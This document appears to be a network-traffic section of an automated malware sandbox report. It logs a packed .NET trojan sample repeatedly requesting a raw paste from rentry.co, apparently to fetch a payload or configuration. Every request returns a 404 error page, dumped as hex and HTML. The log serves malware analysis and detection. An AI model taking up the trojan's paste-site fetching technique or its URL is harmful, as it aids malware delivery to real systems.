                                                                                        2024-10-18 10:44:18 UTC688INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:18 UTC1369INData Raw: 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64
                                                                                        Data Ascii: ons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and ed
                                                                                        2024-10-18 10:44:18 UTC1369INData Raw: 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69
                                                                                        Data Ascii: try.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container contai
                                                                                        2024-10-18 10:44:18 UTC1034INData Raw: 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 61 63 38 64 33 33 30 62 63 37 27 2c
                                                                                        Data Ascii: ipt src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eeac8d330bc7',
                                                                                        2024-10-18 10:44:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        81192.168.2.660743104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:18 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:19 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:19 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q3h90GKs1Bz5QQDZdksNDJALPXkR%2FWUFQKXZH%2BHHJ7guHDP3lE3Yp98%2F9r2c%2FVgTIIhRBFiy1hkjmuev3mej9xHd%2FygMdT%2F9DohKEK34MVgZEYD85kerq391rA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eeb28e04e942-DFW
                                                                                        2024-10-18 10:44:19 UTC707INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:19 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:44:19 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:19 UTC1015INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 62 32 38 65 30 34 65 39 34 32 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 31 4f 53 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eeb28e04e942',t:'MTcyOTI0ODI1OS4w
                                                                                        2024-10-18 10:44:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        82192.168.2.660744104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:20 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:20 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:20 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pojf5wWe%2BI9CFv2KHLbAdvLX8xkoN5oKQLGtKd6mRZn%2F1SIs0XPk%2BbSV1E2j8n5ROR0Nc0FfW9XFxz0eEhWHrRhpgVYK%2Bx6u54YjvTmOvSDqiVrqarhgy%2Fe%2F5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eeb9ab036b51-DFW
                                                                                        2024-10-18 10:44:20 UTC707INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:20 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:44:20 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:20 UTC1014INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 62 39 61 62 30 33 36 62 35 31 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 32 4d 43 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eeb9ab036b51',t:'MTcyOTI0ODI2MC4w
                                                                                        2024-10-18 10:44:20 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:44:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        83192.168.2.660746104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:21 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:21 UTC683INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:21 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykmvK2%2FdrkpDlvdv%2BMh01NM39KLR8hZDdlzD3ijAWo5SkuSsUqL6Qvy5wh2avzvmvTqQ6xo1UXaScSNcVqW%2Fyr0x%2FP0B6hvVU%2FkjcETDOdPkv0Ow0dLgOwQKeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eebfaea16bd2-DFW
                                                                                        2024-10-18 10:44:21 UTC686INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:21 UTC1369INData Raw: 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20
                                                                                        Data Ascii: icons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and
                                                                                        2024-10-18 10:44:21 UTC1369INData Raw: 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74
                                                                                        Data Ascii: entry.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container cont
                                                                                        2024-10-18 10:44:21 UTC1036INData Raw: 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 62 66 61 65 61 31 36 62 64 32
                                                                                        Data Ascii: cript src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eebfaea16bd2
                                                                                        2024-10-18 10:44:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        84192.168.2.660747104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:22 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:22 UTC679INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:22 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lXvK49%2BIov94n2u9nHoT2rMXVZXb%2FxGxM0PEaXaQcwMIuKxBaI%2FjWXiO02ktxF1kwJpM3lPCMz3ytT0hKadO5aJ8o9wiu8bK4qaFeEvhccTSou5DDbQLTIuvTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eec719c9e7aa-DFW
